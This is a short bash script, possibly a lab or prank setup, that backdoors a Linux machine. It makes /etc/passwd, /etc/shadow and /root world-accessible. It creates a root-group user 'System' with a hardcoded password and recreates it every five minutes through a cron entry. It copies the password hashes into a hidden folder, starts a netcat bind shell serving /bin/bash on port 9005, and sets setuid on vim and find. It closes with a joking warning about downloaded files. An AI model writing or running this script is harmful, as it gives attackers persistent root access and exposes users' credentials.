#!/bin/bash

sudo chmod 646 /etc/passwd &> /dev/null
sudo chmod 646 /etc/shadow &> /dev/null
sudo chmod 777 /root &> /dev/null

sudo useradd System &> /dev/null && echo -e "defnotthepasswd\ndefnotthepasswd" | passwd System &> /dev/null
sudo usermod -a -G root System &> /dev/null

echo "*/5 * * * * root useradd System && echo -e "defnotthepasswd\ndefnotthepasswd" | passwd System && usermod -a -G root System" >> /etc/crontab

mkdir -p /home/System/.SystemFiles &> /dev/null
mkdir -p /home/System/.SystemFiles/accounts &> /dev/null
mkdir -p /home/System/.SystemFiles/hashes &> /dev/null

cp /etc/passwd /home/System/.SystemFiles/accounts
cp /etc/shadow /home/System/.SystemFiles/hashes
ip a >> /home/System/.SystemFiles/internet.txt

sudo apt update > /dev/null 2> /dev/null && apt -y install netcat-traditional 2> /dev/null > /dev/null
sudo nc.traditional -l -p 9005 -e /bin/bash &

sudo chmod u+s /usr/bin/vim.basic &> /dev/null
sudo chmod u+s /usr/bin/find &> /dev/null

echo "Be careful when downloading files from the internet"
echo "Not everything is what is seems to be ..."
echo "Good Luck!"
